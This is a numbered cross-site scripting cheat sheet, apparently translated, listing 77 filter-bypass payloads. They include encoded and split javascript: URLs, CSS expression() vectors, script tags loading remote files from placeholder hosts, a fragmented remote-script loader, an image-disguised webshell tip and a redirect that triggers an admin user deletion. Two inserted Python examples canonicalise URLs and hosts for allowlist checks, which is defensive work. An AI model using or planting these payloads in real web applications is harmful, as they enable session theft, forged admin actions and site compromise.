Cross-site image shell
XSS cross-site code: <script>alert("")</script>

Put the code on the first line of the webshell and change the shell into JPG image format; when the image-format shell is accessed, our shell is still executed.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab to split up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab to split up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically have no effect in China, because there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escape filter
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image plus extra characters (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (consisting of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">
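
Items 3 to 19 and the CSS url()/expression() items 39 to 54 all rely on the same filter mistake: searching the raw attribute value for the literal string javascript:, while the browser first decodes HTML entities, skips leading control characters and drops embedded tab, newline and carriage-return characters before it reads the scheme. The following is an added example written for this page, not code from the original post: a Python canonicaliser that applies the same decoding steps a browser does and then allowlists the scheme instead of blocklisting one string. The function names, the ALLOWED_SCHEMES set and the sample inputs are assumptions for illustration; the samples are constructed after the post's items.

```python
import html
import re
from typing import Optional

# Added example, not code from the original post. Sample inputs are
# constructed after the post's items; function names and ALLOWED_SCHEMES
# are assumptions for illustration.

# Characters a browser skips in front of a URL before it reads the scheme.
# Covers the code points the post lists under item 47 (1-32, 34, 39, 160,
# 8192-8207, 12288, 65279); the two quote characters are included so that a
# quoted CSS url() value is handled by the same code.
LEADING_JUNK = (''.join(chr(c) for c in range(0, 33)) + '"\''
                + '\u00a0\u3000\ufeff'
                + ''.join(chr(c) for c in range(0x2000, 0x2010)))

# Control characters and spaces dropped from inside the scheme. The URL
# specification only removes tab, LF and CR (items 11-14); NUL (item 17) and
# plain space are removed as well here, which is stricter than any browser
# and therefore safe for a validator.
INNER_CONTROLS = re.compile(r'[\x00-\x20]')

SCHEME_RE = re.compile(r'^([a-z][a-z0-9+.-]*):')

# Allowlist: every scheme not listed (javascript, vbscript, data, ...) is rejected.
ALLOWED_SCHEMES = frozenset({'http', 'https', 'mailto'})


def naive_blocklist_passes(value: str) -> bool:
    """The kind of filter items 3-19 are written to get past: it only looks
    for the literal lowercase string 'javascript:'."""
    return 'javascript:' not in value


def canonical_scheme(value: str) -> Optional[str]:
    """Return the scheme a browser would act on (lowercased), or None for a
    relative or scheme-relative URL. Mirrors the order in which a browser
    processes an attribute: entity decoding first, then URL parsing."""
    decoded = html.unescape(value)   # &#106; &#x6A &#0000106, with or without ';' (items 5, 8-10)
    decoded = decoded.strip(LEADING_JUNK)
    # A scheme can only appear before the first '/', '?' or '#', so only that
    # prefix is normalised; 'jav\tascript:' and 'java\0script:' collapse here.
    head = re.split(r'[/?#]', decoded, maxsplit=1)[0]
    head = INNER_CONTROLS.sub('', head).lower()
    match = SCHEME_RE.match(head)
    return match.group(1) if match else None


def is_safe_url(value: str) -> bool:
    """Allowlist decision for an href/src-style attribute value."""
    scheme = canonical_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES


CSS_COMMENT_RE = re.compile(r'/\*.*?\*/', re.DOTALL)
CSS_URL_RE = re.compile(r'url\(\s*(.*?)\s*\)', re.IGNORECASE | re.DOTALL)


def css_is_safe(declaration: str) -> bool:
    """Check a style attribute or declaration block (items 39, 46-53):
    comments are removed first so 'ex/*x*/pression' reads as 'expression',
    then every url() value goes through the same scheme allowlist."""
    text = CSS_COMMENT_RE.sub('', declaration)
    if 'expression(' in INNER_CONTROLS.sub('', text).lower():
        return False
    return all(is_safe_url(url) for url in CSS_URL_RE.findall(text))


if __name__ == '__main__':
    # Constructed samples modelled on items 4, 11, 17, 19 and 5 of the post,
    # plus one ordinary https URL for comparison.
    samples = [
        "JaVaScRiPt:alert('XSS')",
        "jav\tascript:alert('XSS')",
        "java\0script:alert('XSS')",
        "&#14;  javascript:alert('XSS')",
        "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
        "https://example.com/img.png",
    ]
    for sample in samples:
        print(f"{sample!r:75} blocklist_passes={naive_blocklist_passes(sample)!s:5} "
              f"scheme={canonical_scheme(sample)!s:10} safe={is_safe_url(sample)}")
```

Run as a script, every obfuscated sample passes the naive blocklist while canonical_scheme still resolves it to javascript and is_safe_url rejects it. In an application the check belongs after the HTML has been parsed server-side: call is_safe_url on each URL-valued attribute and css_is_safe on each style value, rather than searching the raw input for strings.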

(55) EMBED tag; you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript inside Flash, you can mix your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) Decimal IP
<A HREF="http://3232235521">XSS</A>

(71) Hexadecimal IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot / absolute DNS
<A HREF="http://www.google.com./">XSS</A>
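
Items 68 to 76 show one host written in several forms that a browser resolves to the same place: a decimal, hexadecimal, octal or mixed IPv4 literal, a URL with tab or newline characters inside it, a scheme-relative URL, and a hostname with a trailing dot. A host allowlist that compares strings accepts or rejects each form differently. The following is an added example written for this page, not code from the original post: a Python canonicaliser that rewrites the host the way a browser does before it is compared, following the IPv4 host parsing rules browsers use (leading parts are one byte each, the last part fills the remaining bytes). The function names and the allowlist are assumptions; the sample URLs are the post's own plus a few constructed ones, and the item 73 sample uses real tab and newline characters where the post renders spaces.

```python
import re
from urllib.parse import urlsplit

# Added example, not code from the original post. Function names and the
# allowlist are assumptions for illustration.

# Tab, LF and CR are removed from a URL before it is parsed (item 73 relies
# on this; the post renders those characters as spaces).
URL_CONTROLS = re.compile(r'[\t\n\r]')

_DIGIT_RULES = {16: r'[0-9a-f]*', 8: r'[0-7]+', 10: r'[0-9]+'}


def _parse_ipv4_number(part: str):
    """One dotted part, using the rules browsers apply: a '0x' prefix means
    hex, a leading '0' means octal, anything else is decimal. None if the
    part is not a number in that base."""
    if part == '':
        return None
    if part[:2].lower() == '0x':
        digits, base = part[2:], 16
    elif len(part) > 1 and part[0] == '0':
        digits, base = part[1:], 8
    else:
        digits, base = part, 10
    if not re.fullmatch(_DIGIT_RULES[base], digits.lower()):
        return None
    return int(digits, base) if digits else 0   # a bare '0x' is zero


def parse_ipv4_host(host: str):
    """Dotted-quad string if host is an IPv4 literal in any notation a
    browser accepts (decimal, hex, octal, one to four parts, mixed; items
    70-73), otherwise None, meaning the host is a domain name."""
    parts = host.split('.')
    if len(parts) > 1 and parts[-1] == '':
        parts.pop()                      # trailing dot, item 76
    if not 1 <= len(parts) <= 4:
        return None
    numbers = [_parse_ipv4_number(p) for p in parts]
    if any(n is None for n in numbers):
        return None
    *head, last = numbers
    # Every leading part is one byte; the last part fills the remaining bytes.
    if any(n > 255 for n in head) or last >= 256 ** (5 - len(numbers)):
        return None
    value = last
    for i, n in enumerate(head):
        value += n << (8 * (3 - i))
    return '.'.join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_host(url: str) -> str:
    """The host a browser would actually connect to: control characters
    removed, scheme-relative URLs accepted (item 74), lowercased, trailing
    dot dropped (item 76), numeric IPv4 forms rewritten as dotted quads."""
    cleaned = URL_CONTROLS.sub('', url.strip())
    host = (urlsplit(cleaned).hostname or '').rstrip('.')
    return parse_ipv4_host(host) or host


def host_allowed(url: str, allowlist) -> bool:
    """Exact match on the canonical host. 'google.com' and 'www.google.com'
    (item 75) stay distinct; the allowlist must list both if both are meant."""
    return canonical_host(url) in allowlist


if __name__ == '__main__':
    for url in ['http://127.0.0.1/', 'http://3232235521', 'http://0xc0.0xa8.0x00.0x01',
                'http://0300.0250.0000.0001', 'h\ntt\tp://6\t6.000146.0x7.147/',
                '//www.google.com/', 'http://google.com/', 'http://www.google.com./']:
        print(f'{url!r:40} -> {canonical_host(url)}')
```

The three numeric forms under items 70 to 72 all print 192.168.0.1, and the item 73 form prints 66.102.7.147, so an allowlist or blocklist keyed on canonical_host sees one value regardless of how the link was written. Note that _parse_ipv4_number treats an invalid digit for the chosen base (for example 08 as octal) as "not a number", which makes the host fall through as a domain name; that is the conservative choice for a validator.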

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>